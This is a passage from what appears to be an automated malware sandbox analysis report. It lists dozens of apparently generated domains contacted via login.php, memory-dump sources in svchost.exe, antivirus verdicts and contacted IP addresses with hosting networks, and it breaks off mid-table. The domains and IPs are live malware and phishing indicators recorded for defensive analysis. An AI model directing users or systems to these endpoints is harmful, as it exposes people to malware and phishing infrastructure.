                                                                                                                                                                                                              NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                              http://lyvyxor.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://lyrysor.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://puzylyp.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://lyxynyx.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://vojyqem.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://galynuh.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://qetyhyg.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://lymyxid.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://gadyniw.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://gahyhiz.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://qegyval.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://pupydeq.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://106.15.137.66:8001/dh/147287063_637385.htmltrue
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://lygyvuj.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://ww3.galyqaz.com/true
                                                                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://gadyciz.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://gatyhub.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://ww25.lyxynyx.com/login.php?subid1=20240824-0248-365f-be38-e61788a8e181true
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://ww25.lyxynyx.com/login.php?subid1=20240824-0247-3858-b174-cdc5f33d229ctrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://lysyfyj.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://vocyzit.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://galyqaz.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://www.gahyqah.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://gatyfus.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://qegyhig.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://lysyvan.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://ww16.vofycot.com/login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7true
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://qetyfuv.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://qexyhuv.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://vonypom.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://pupycag.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://vofycot.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://ww16.vofycot.com/login.php?sub1=20240824-0247-3846-ad61-5b1f45bc95f4true
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://lysyvan.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://qegyhig.com/login.phptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                              https://nojs.domaincntrol.comlogin[3].htm1.1.dr, login[3].htm.1.dr, login[3].htm0.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2login[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://gadyniw.com/login.phpMysvchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://galynuh.com/login.php.svchost.exe, 00000001.00000003.2784846138.000000000087F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2login[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://galyqaz.com/Personals.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGtsEGsOf%2BBeruClQxvsvchost.exe, 00000001.00000003.2274238543.0000000009206000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://domaincntrol.com/?orighost=login[3].htm1.1.dr, login[3].htm.1.dr, login[3].htm0.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otflogin[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixlogin[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://InquiryGrid.com/sk-domsale.php?dom=galyqaz.com&eds=YnJva2VyYWdlQHNrZW56by5jb20%3D&_isk_=7444&login[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://vojyqem.com/login.phpTempsvchost.exe, 00000001.00000002.2910643811.0000000000871000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://galyqaz.com/display.cfmlogin[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://puzylyp.com/login.phpMysvchost.exe, 00000001.00000003.2868451599.00000000008EE000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularlogin[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://vocyzit.com/loginsvchost.exe, 00000001.00000003.2274238543.0000000009210000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/pics/29590/bg1.png)login[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://ww25.lyxynyx.com/login.php?subid1=20240824-0247-3858-b174-cdc5f33d229ccosvchost.exe, 00000001.00000003.2867988784.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttflogin[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://galyqaz.com/Networking_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yalogin[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://img.sedoparking.com/templates/images/hero_nc.svgsvchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldlogin[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.comcomsvchost.exe, 00000001.00000003.2036392880.000000000263A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://qegyhig.com//svchost.exe, 00000001.00000003.1728701380.0000000002667000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://galyqaz.com/Computerspiele.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4Dlogin[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixlogin[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://gadyniw.com/login.php3svchost.exe, 00000001.00000002.2911300230.00000000008EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://galyqaz.com/IT_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4DW2ologin[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cClogin[1].htm.1.dr, login[2].htm0.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://www.gahyqah.com/login.phpPsvchost.exe, 00000001.00000003.2195433175.00000000008EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://dts.gnpge.comsvchost.exe, 00000001.00000003.2274238543.0000000009206000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://www.namecheap.com/domains/registration/results/?domain=gahyqah.comsvchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://lyvyxor.com/login.php_Lsvchost.exe, 00000001.00000003.2195591504.00000000008A9000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://cdn.consentmanager.netlogin[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://lysyvan.com/svchost.exe, 00000001.00000003.1896894757.0000000002674000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://lysyvan.com/wp-json/svchost.exe, 00000001.00000003.2036392880.000000000263A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/pics/28903/search.png)login[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://qegyhig.com/login.phpAppDatasvchost.exe, 00000001.00000002.2910643811.0000000000871000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://galyqaz.com/Search_Engine_Ranking.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52login[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otflogin[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com0svchost.exe, 00000001.00000002.2911856330.0000000002661000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotlogin[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://www.google.comsvchost.exe, svchost.exe, 00000001.00000003.2886286564.000000000926D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833106604.00000000026E7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2910825545.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2886133137.0000000000899000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2088018994.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1688004757.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1728739248.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2868421198.00000000026EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2679082243.0000000009201000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911227483.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2886133137.000000000088D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2913316247.0000000009232000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2209935730.00000000008F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2898455985.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911000726.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2195433175.00000000008EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801259005.00000000026EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2898624617.0000000009225000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1688063910.000000000087C000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://www.google.comlsvchost.exe, 00000001.00000003.1688063910.000000000087C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://gatyfus.com/login.phpd%svchost.exe, 00000001.00000003.2195591504.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://qegyhig.com/wp-json/svchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2912011123.00000000026AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://www.google.comtsvchost.exe, 00000001.00000003.1681297112.000000000264B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1681297112.000000000263E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1681297112.000000000263A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.comsvchost.exe, 00000001.00000003.2679082243.0000000009201000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911856330.0000000002661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801351584.0000000002661000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://delivery.consentmanager.netlogin[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://galyqaz.com/login.php0svchost.exe, 00000001.00000002.2911000726.00000000008B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://qegyhig.com/svchost.exe, 00000001.00000002.2911905036.000000000266F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2046828738.0000000002674000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1896894757.0000000002674000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1728739248.0000000002674000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotlogin[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.comhttp://106.15.137.66:8001/dh/svchost.exe, 00000001.00000002.2911000726.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2188198886.0000000002665000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)login[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://api.w.org/svchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2912011123.00000000026AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.wofflogin[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://www.sedo.com/services/parking.php3svchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://qegyhig.com/login.phpgpage.namecheap.com;::ffff:91.195.240.19;svchost.exe, 00000001.00000002.2912087987.00000000026CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://galyqaz.com/Personals.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4DW2oyVlogin[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttflogin[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://ww25.lyxynyx.com/login.php?subid1=20240824-0248-365f-be38-e61788a8e181cosvchost.exe, 00000001.00000003.2867988784.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://ww3.galyqaz.com/DigiCertsvchost.exe, 00000001.00000003.1728701380.0000000002667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1855025683.0000000002667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2188198886.0000000002665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801351584.0000000002661000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.wofflogin[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/js/min.js?v2.3login[4].htm.1.drfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://qegyhig.com/m/svchost.exe, 00000001.00000003.1728739248.0000000002674000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://gadyniw.com/login.php/svchost.exe, 00000001.00000002.2911000726.00000000008B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              3.94.10.34
                                                                                                                                                                                                              lymyxid.comUnited States
                                                                                                                                                                                                              14618AMAZON-AESUStrue
                                                                                                                                                                                                              64.190.63.136
                                                                                                                                                                                                              www.sedoparking.comUnited States
                                                                                                                                                                                                              11696NBS11696UStrue
                                                                                                                                                                                                              15.197.240.20
                                                                                                                                                                                                              qexyhuv.comUnited States
                                                                                                                                                                                                              7430TANDEMUStrue
                                                                                                                                                                                                              172.234.222.143
                                                                                                                                                                                                              vojyqem.comUnited States
                                                                                                                                                                                                              20940AKAMAI-ASN1EUtrue
                                                                                                                                                                                                              72.52.179.174
                                                                                                                                                                                                              pltraffic7.comUnited States
                                                                                                                                                                                                              32244LIQUIDWEBUStrue
                                                                                                                                                                                                              154.85.183.50
                                                                                                                                                                                                              qegyval.comSeychelles
                                                                                                                                                                                                              134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                                                                                                                                              64.225.91.73
                                                                                                                                                                                                              galynuh.comUnited States
                                                                                                                                                                                                              14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                                                                              69.162.80.60
                                                                                                                                                                                                              lysyfyj.comUnited States
                                                                                                                                                                                                              46475LIMESTONENETWORKSUStrue
                                                                                                                                                                                                              52.34.198.229
                                                                                                                                                                                                              lygyvuj.comUnited States
                                                                                                                                                                                                              16509AMAZON-02UStrue
                                                                                                                                                                                                              5.79.71.225
                                                                                                                                                                                                              unknownNetherlands
                                                                                                                                                                                                              60781LEASEWEB-NL-AMS-01NetherlandsNLtrue
                                                                                                                                                                                                              199.191.50.83
                                                                                                                                                                                                              galyqaz.comVirgin Islands (BRITISH)
                                                                                                                                                                                                              40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                                                                                                              13.248.169.48
                                                                                                                                                                                                              pupydeq.comUnited States
                                                                                                                                                                                                              16509AMAZON-02UStrue
                                                                                                                                                                                                              106.15.137.66
                                                                                                                                                                                                              unknownChina
                                                                                                                                                                                                              37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                                                                                                                                                                              103.224.212.210
                                                                                                                                                                                                              lyxynyx.comAustralia
                                                                                                                                                                                                              133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                                                                                                                              18.208.156.248
                                                                                                                                                                                                              pupycag.comUnited States
                                                                                                                                                                                                              14618AMAZON-AESUStrue
                                                                                                                                                                                                              208.100.26.245
                                                                                                                                                                                                              lyvyxor.comUnited States
                                                                                                                                                                                                              32748STEADFASTUStrue
                                                                                                                                                                                                              103.224.182.252
                                                                                                                                                                                                              vofycot.comAustralia
                                                                                                                                                                                                              133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                                                                                                                              199.59.243.226
                                                                                                                                                                                                              77026.bodis.comUnited States
                                                                                                                                                                                                              395082BODIS-NJUStrue
                                                                                                                                                                                                              103.150.11.230
                                                                                                                                                                                                              gtm-sg-6l13ukk0m05.qu200.comunknown
                                                                                                                                                                                                              59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                                                                                                                                                                                              3.64.163.50
                                                                                                                                                                                                              puzylyp.comUnited States
                                                                                                                                                                                                              16509AMAZON-02UStrue
                                                                                                                                                                                                              91.195.240.19
                                                                                                                                                                                                              parkingpage.namecheap.comGermany
                                                                                                                                                                                                              47846SEDO-ASDEtrue
                                                                                                                                                                                                              162.255.119.102
                                                                                                                                                                                                              gahyqah.comUnited States
                                                                                                                                                                                                              22612NAMECHEAP-NETUStrue
                                                                                                                                                                                                              188.114.97.3
                                                                                                                                                                                                              lysyvan.comEuropean Union
                                                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                                                              44.221.84.105
                                                                                                                                                                                                              gadyciz.comUnited States
                                                                                                                                                                                                              14618AMAZON-AESUStrue
                                                                                                                                                                                                              154.212.231.82
                                                                                                                                                                                                              gadyniw.comSeychelles
                                                                                                                                                                                                              133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKtrue
                                                                                                                                                                                                              188.114.96.3
                                                                                                                                                                                                              qegyhig.comEuropean Union
                                                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                                                              85.17.31.122
                                                                                                                                                                                                              unknownNetherlands
                                                                                                                                                                                                              60781LEASEWEB-NL-AMS-01NetherlandsNLtrue
                                                                                                                                                                                                              69.162.80.58
